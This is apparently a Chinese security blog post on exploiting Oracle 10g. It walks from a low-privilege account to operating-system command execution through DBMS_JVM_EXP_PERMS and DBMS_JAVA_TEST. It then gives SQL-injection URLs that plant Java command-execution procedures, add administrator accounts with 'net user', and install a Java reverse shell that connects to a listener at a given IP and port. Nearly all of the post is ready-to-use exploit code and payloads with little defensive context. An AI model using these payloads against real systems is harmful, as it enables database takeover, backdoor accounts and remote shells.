create user xiaozi identified by xiaozi;
grant create session to xiaozi;
10g 低权限提升
C:\Documents and Settings\Administrator>sqlplus xiaozi/xiaozi@orcl
SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 11月 2 00:30:37 2016
Copyright (c) 1982, 2005, Oracle. All rights reserved.
连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL>
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.io.FilePermission','<<ALL
FILES>>','execute','ENABLED' from dual;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
PL/SQL 过程已成功完成。
SQL>
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','w
riteFileDescriptor',NULL,'ENABLED' FROM DUAL;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
PL/SQL 过程已成功完成。
SQL>
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','r
eadFileDescriptor',NULL,'ENABLED' FROM DUAL;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
PL/SQL 过程已成功完成。
SQL>
SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\wind
ows\\system32\\cmd.exe', '/c', 'dir>c:\\10gOUT.LST') FROM DUAL;
DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\\WINDOWS\\SYSTEM3
--------------------------------------------------------------------------------
SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\wind
ows\\system32\\cmd.exe','/c','net user abc abc /add') FROM DUAL;
DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\\WINDOWS\\SYSTEM3
--------------------------------------------------------------------------------
Oracle 10g web注入技巧
create or replace and resolve java source named JAVACMD as
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execmd(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
}
create or replace procedure MYJAVACMD(command in varchar) as language java
name 'JAVACMD.execmd(java.lang.String)';
exec MYJAVACMD('net user');
web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;
begin execute immediate ''create or replace and resolve java source named JAVACMD as import java.lang.*;import java.io.*;public
class JAVACMD{public static void execmd(String command) throws IOException{Runtime.getRuntime().exec(command);}} ''; commit;
end;') from dual) is not null
web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;
begin execute immediate ''create or replace procedure MYJAVACMD(command in varchar) as language java name
''''JAVACMD.execmd(java.lang.String)''''; ''; commit;end;') from dual) is not null
web :http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('begin myjavacmd(''net user admin admin /add'')
;commit;end;') from dual) is not null
create or replace and compile java source named javasocket as
import java.net.*;
import java.io.*;
import java.lang.*;
public class javasocket
{
public static void test(String addr,String str_port)
{
Socket socket;
String len;
String s;
InputStream Is;
OutputStream Os;
DataInputStream DIS;
PrintStream PS;
try{
socket=new Socket(addr,Integer.parseInt(str_port));
Is=socket.getInputStream();
Os=socket.getOutputStream();
DIS=new DataInputStream(Is);
PS=new PrintStream(Os);
while(true){
s=DIS.readLine();
if(s.trim().equals("BYE"))break;
try{
Runtime rt = Runtime.getRuntime();
Process p = null;
p = rt.exec(s);
s = null;
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String msg = null;
while((msg = br.readLine())!=null){
msg += "\n";
s += msg;
}
br.close();
}
catch(Exception e)
{
s = "Please check your command!";
}
PS.println(s);
}
DIS.close();
PS.close();
Is.close();
Os.close();
socket.close();
}
catch(Exception e)
{
System.out.println("Error:"+e);
}
}
}
create or replace procedure myjavasocket(address in varchar,port in varchar) as language java
name 'javasocket.test(java.lang.String,java.lang.String)';
exec myjavasocket('192.168.106.137','9999');
SQL> drop java source javasocket;
Java 已删除。
SQL> drop procedure myjavasocket;
过程已删除。
http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream();
Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals("BYE"))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += "\n"; s += msg;}br.close();}catch(Exception e){s = "Please check your command!";}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--
数字型和字符型,在于一个双引号的区别
http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream();
Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals(null))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += null; s += msg;}br.close();}catch(Exception e){s = null;}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
参考文章:
citeseerx.ist.psu.edu/viewdoc/dow…
www.notsosecure.com/hacking-ora…
